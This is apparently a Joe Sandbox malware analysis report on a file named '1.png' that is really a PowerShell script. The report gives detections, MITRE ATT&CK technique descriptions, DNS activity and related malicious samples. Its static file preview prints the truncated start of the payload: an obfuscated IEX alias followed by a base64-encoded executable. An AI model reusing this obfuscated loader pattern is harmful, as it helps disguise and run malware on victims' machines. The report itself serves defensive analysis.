Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Users\user\Desktop\1.png VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Windows\Fonts\SegUIVar.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 DLL Side-Loading	LSASS Memory	11 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1.png	21%	ReversingLabs	Script.Trojan.Heuristic

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
tse1.mm.bing.net	unknown	unknown	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586015
Start date and time:	2025-01-08 16:15:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1.png
Detection:	MAL
Classification:	mal48.winPNG@1/1@1/0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.227.198, 2.23.227.221, 2.23.227.199, 2.23.227.222, 2.23.227.208, 23.44.203.211, 23.56.254.164, 20.12.23.50, 20.103.156.88, 20.190.160.22
Excluded domains from analysis (whitelisted): www.bing.com, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, www-www.bing.com.trafficmanager.net, x1.c.lencr.org, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, mm-mm.bing.net.trafficmanager.net, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 1.png

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	atomxml.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	192.229.221.95
	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	XWorm	Browse	192.229.221.95
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.229.221.95
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exe	Get hash	malicious	AsyncRAT, GhostRat	Browse	192.229.221.95
	xmr.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	sasdriver_2.0.20.119.exe_MDE_File_Sample_dc3db78edf1ce84f101e976a9966edb4cf6dcd75.zip	Get hash	malicious	Unknown	Browse	192.229.221.95
ax-0001.ax-msedge.net	https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3D	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	150.171.28.10
	mail (4).eml	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://www.kentuckyfriedsalmonpadon.com/caHbBZm	Get hash	malicious	Unknown	Browse	150.171.27.10
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	150.171.27.10
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	150.171.27.10
	https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604	Get hash	malicious	Unknown	Browse	150.171.28.10
	https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44d	Get hash	malicious	Unknown	Browse	150.171.28.10

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\debug\WIA\wiatrace.log

Download File

Process:	C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	5.261505195890021
Encrypted:	false
SSDEEP:	48:0uPAiSmXySNS3RzE347RTzk0uS3RzE347RTzGz0BSkuHSw3R:0EAiSmiSNS3RzogRHwS3RzogRHGISdHR
MD5:	CFCDEF71C3A24E391B1AEDF8DFC37167
SHA1:	F9951FB875628FA24232A85642DED621F111BB0E
SHA-256:	18024BB01E466A6C5422E7F390CCED55DB131AACC9AB29B4CED8FD64CC0004A8
SHA-512:	70713049996137B56131D2FEB507B584D8AB7C8E0CAC6FE9C3E84FD57C64B6BFBD18E677F719DCF4AAED954B68A9B4ECF514A9362E3006F4A0DCB63238274000
Malicious:	false
Reputation:	low
Preview:	..************** Started trace for Module: [sti.dll] in Executable [mspaint.exe] ProcessID: [6668] at 2025/01/08 10:16:50:874 *************..WIA: 6668.6700 47 0 0 [sti.dll] AsyncRPCEventTransport::OpenConnectionToServer, AsyncRPC Connection established to server..WIA: 6668.6700 78 0 0 [sti.dll] AsyncRPCEventTransport::OpenConnectionToServer, Got my context 0000016E8BB4F020 from server...WIA: 6668.6700 78 0 0 [sti.dll] WiaEventReceiver::Start, WiaEventReceiver Started.....WIA: 6668.6700 78 0 0 [sti.dll] AsyncRPCEventTransport::SendRegisterUnregisterInfo, Sent RPC Register/Unregister information...WIA: 6668.6700 78 0 0 [sti.dll] WiaEventReceiver::SendRegisterUnregisterInfo, Added new registration:..WIA: 6668.6700 78 0 0 [sti.dll] EventRegistrationInfo::Dump, dwFlags: 0x00000000, guidEvent: {A28BBADE-64B6-11D2-A231-00C04FA31809}, bstrDeviceID: , callback: 0x0000016E8BA321C0..WIA: 6668.6700 78 0 0 [sti.dll] AsyncRPCEventTransport::SendRegisterUnregisterInfo, Sent RPC Register/Unregis

Static File Info

General

File type:	ASCII text, with very long lines (65461), with CRLF line terminators
Entropy (8bit):	5.0698319105078795
TrID:
File name:	1.png
File size:	115'261 bytes
MD5:	8df4ac24ea37d95679dda12bbdf3d021
SHA1:	8c7881e04b2ec0e4f352e531ad02a31e79a36b53
SHA256:	1417811e6df4fa655aa70a388473d57e529526674011fd60a1ea56b86684118b
SHA512:	692b3c8d8aaa9e9f96e5d3a8e58ded31546e26a9f39f4b8ef25d44dafc2616eaa980913e4597a1b16db5eb7127667ed7967844558b8c61818e903220decb87a8
SSDEEP:	3072:kvUixeAKzAgnV8519yuKXwB4c4K15IiTksfUXLID5uzynrKMkHckRJs9Skjugil6:yeAKzAgnVwyuKXwB4c4K15IiTksfUXLW
TLSH:	C5B31A321103BD8EABBF2E45A9002DA04CDC65779B459548FDC906FA96BB9148F3DEB0
File Content Preview:	ipconfig /flushdns...... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQ

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:16:47.683451891 CET	61745	53	192.168.2.24	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 16:16:47.683451891 CET	192.168.2.24	1.1.1.1	0x6278	Standard query (0)	tse1.mm.bing.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 16:16:45.796308041 CET	1.1.1.1	192.168.2.24	0xfe81	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 16:16:45.796308041 CET	1.1.1.1	192.168.2.24	0xfe81	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:16:47.690665007 CET	1.1.1.1	192.168.2.24	0x6278	No error (0)	tse1.mm.bing.net	mm-mm.bing.net.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 16:16:47.690665007 CET	1.1.1.1	192.168.2.24	0x6278	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:16:47.690665007 CET	1.1.1.1	192.168.2.24	0x6278	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: mspaint.exePID: 6668, Parent PID: 4472

General

Target ID:	0
Start time:	10:16:49
Start date:	08/01/2025
Path:	C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe
Wow64 process (32bit):	false
Commandline:	mspaint.exe "C:\Users\user\Desktop\1.png"
Imagebase:	0x7ff64cd50000
File size:	4'328'960 bytes
MD5 hash:	ED77A474C513D8F7A1481EEB1C978AAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.png

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\debug\WIA\wiatrace.log

Static File Info

General

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: mspaint.exePID: 6668, Parent PID: 4472

General

Chronological Activities

Disassembly

Windows Analysis Report
1.png